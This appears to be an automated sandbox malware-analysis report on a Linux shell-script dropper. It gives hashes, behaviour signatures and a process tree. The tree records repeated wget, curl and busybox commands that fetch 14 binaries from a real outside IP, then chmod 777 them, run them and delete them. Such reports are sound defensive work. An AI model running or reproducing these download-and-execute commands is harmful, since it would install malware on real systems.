Analysis
max time kernel: 16s
max time network: 18s
platform: debian-9_armhf
resource: debian9-armhf-20240729-en
resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 01-11-2024 03:33
Static task: static1
Behavioral task: behavioral1
  Sample: 4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
  Resource: ubuntu1804-amd64-20240508-en
Behavioral task: behavioral2
  Sample: 4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
  Resource: debian9-armhf-20240729-en
Behavioral task: behavioral3
  Sample: 4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
  Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
  Sample: 4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
  Resource: debian9-mipsel-20240611-en
General
Target: 4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Size: 10KB
MD5: 01b56d1b9cc005de6042881dafcef1bf
SHA1: 37f98670c045d4e2627287b76bed156bae8d9a10
SHA256: 4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8
SHA512: 617294ee58e825e6af28f02ab893ca33b04be9f8b1154d6f335a5b8085e2706046661ab704c92730764d6e1b132af69593e9d054e4fe2a31c9aa326ab52f6ac2
SSDEEP: 192:qfHqRU7VKbQJxAcqZdGhBu4pHZdGhBNTfHqTY9JxAcp:pS7VKblKLs9
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
675  chmod
702  chmod
780  chmod
831  chmod
757  chmod
795  chmod
825  chmod
813  chmod
819  chmod
682  chmod
722  chmod
747  chmod
801  chmod
807  chmod
Executes dropped EXE 14 IoCs
ioc  pid  Process
/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8  677  SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR  683  j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX  703  nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6  725  UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO  748  rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx  759  vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm  782  DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd  796  aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf  802  TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR  808  JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK  814  yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk  820  jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm  826  ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt  832  YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information, which can indicate whether the system is a virtual machine.
description  ioc  Process
File opened for reading  /proc/cpuinfo  curl  (repeated 14 times)
Reads runtime system information
description  ioc  Process
File opened for reading  /proc/self/auxv  curl  (repeated 14 times)
File opened for reading  /proc/sys/crypto/fips_enabled  curl  (repeated 14 times)
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
description  ioc  Process
File opened for modification  /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8  curl
File opened for modification  /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK  curl
File opened for modification  /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk  curl
File opened for modification  /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm  curl
File opened for modification  /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR  curl
File opened for modification  /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6  curl
File opened for modification  /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx  curl
File opened for modification  /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf  curl
File opened for modification  /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt  curl
File opened for modification  /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX  curl
File opened for modification  /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO  curl
File opened for modification  /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm  curl
File opened for modification  /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd  curl
File opened for modification  /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR  curl
Processes
/tmp/4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh | /tmp/4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh | PID:645
  /bin/rm | /bin/rm bins.sh | PID:647
  /usr/bin/wget | wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 | PID:648
  /usr/bin/curl | curl -O http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 | PID:663
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 | PID:672
  /bin/chmod | chmod 777 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 | PID:675
    - File and Directory Permissions Modification
  /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 | ./SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 | PID:677
    - Executes dropped EXE
  /bin/rm | rm SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 | PID:678
  /usr/bin/wget | wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR | PID:679
  /usr/bin/curl | curl -O http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR | PID:680
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR | PID:681
  /bin/chmod | chmod 777 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR | PID:682
    - File and Directory Permissions Modification
  /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR | ./j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR | PID:683
    - Executes dropped EXE
  /bin/rm | rm j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR | PID:684
  /usr/bin/wget | wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX | PID:686
  /usr/bin/curl | curl -O http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX | PID:692
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX | PID:697
  /bin/chmod | chmod 777 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX | PID:702
    - File and Directory Permissions Modification
  /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX | ./nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX | PID:703
    - Executes dropped EXE
  /bin/rm | rm nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX | PID:704
  /usr/bin/wget | wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 | PID:706
  /usr/bin/curl | curl -O http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 | PID:712
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 | PID:718
  /bin/chmod | chmod 777 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 | PID:722
    - File and Directory Permissions Modification
  /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 | ./UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 | PID:725
    - Executes dropped EXE
  /bin/rm | rm UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 | PID:726
  /usr/bin/wget | wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO | PID:730
  /usr/bin/curl | curl -O http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO | PID:738
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO | PID:745
  /bin/chmod | chmod 777 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO | PID:747
    - File and Directory Permissions Modification
  /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO | ./rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO | PID:748
    - Executes dropped EXE
  /bin/rm | rm rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO | PID:749
  /usr/bin/wget | wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx | PID:750
  /usr/bin/curl | curl -O http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx | PID:751
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx | PID:752
  /bin/chmod | chmod 777 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx | PID:757
    - File and Directory Permissions Modification
  /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx | ./vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx | PID:759
    - Executes dropped EXE
  /bin/rm | rm vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx | PID:760
  /usr/bin/wget | wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm | PID:761
  /usr/bin/curl | curl -O http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm | PID:767
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm | PID:776
  /bin/chmod | chmod 777 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm | PID:780
    - File and Directory Permissions Modification
  /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm | ./DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm | PID:782
    - Executes dropped EXE
  /bin/rm | rm DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm | PID:783
  /usr/bin/wget | wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd | PID:784
  /usr/bin/curl | curl -O http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd | PID:790
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd | PID:794
  /bin/chmod | chmod 777 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd | PID:795
    - File and Directory Permissions Modification
  /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd | ./aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd | PID:796
    - Executes dropped EXE
  /bin/rm | rm aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd | PID:797
  /usr/bin/wget | wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf | PID:798
  /usr/bin/curl | curl -O http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf | PID:799
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf | PID:800
  /bin/chmod | chmod 777 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf | PID:801
    - File and Directory Permissions Modification
  /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf | ./TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf | PID:802
    - Executes dropped EXE
  /bin/rm | rm TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf | PID:803
  /usr/bin/wget | wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR | PID:804
  /usr/bin/curl | curl -O http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR | PID:805
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR | PID:806
  /bin/chmod | chmod 777 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR | PID:807
    - File and Directory Permissions Modification
  /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR | ./JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR | PID:808
    - Executes dropped EXE
  /bin/rm | rm JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR | PID:809
  /usr/bin/wget | wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK | PID:810
  /usr/bin/curl | curl -O http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK | PID:811
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK | PID:812
  /bin/chmod | chmod 777 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK | PID:813
    - File and Directory Permissions Modification
  /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK | ./yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK | PID:814
    - Executes dropped EXE
  /bin/rm | rm yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK | PID:815
  /usr/bin/wget | wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk | PID:816
  /usr/bin/curl | curl -O http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk | PID:817
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk | PID:818
  /bin/chmod | chmod 777 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk | PID:819
    - File and Directory Permissions Modification
  /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk | ./jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk | PID:820
    - Executes dropped EXE
  /bin/rm | rm jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk | PID:821
  /usr/bin/wget | wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm | PID:822
  /usr/bin/curl | curl -O http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm | PID:823
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm | PID:824
  /bin/chmod | chmod 777 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm | PID:825
    - File and Directory Permissions Modification
  /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm | ./ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm | PID:826
    - Executes dropped EXE
  /bin/rm | rm ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm | PID:827
  /usr/bin/wget | wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt | PID:828
  /usr/bin/curl | curl -O http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt | PID:829
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt | PID:830
  /bin/chmod | chmod 777 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt | PID:831
    - File and Directory Permissions Modification
  /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt | ./YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt | PID:832
    - Executes dropped EXE
  /bin/rm | rm YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt | PID:833
  /usr/bin/wget | wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf | PID:834
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97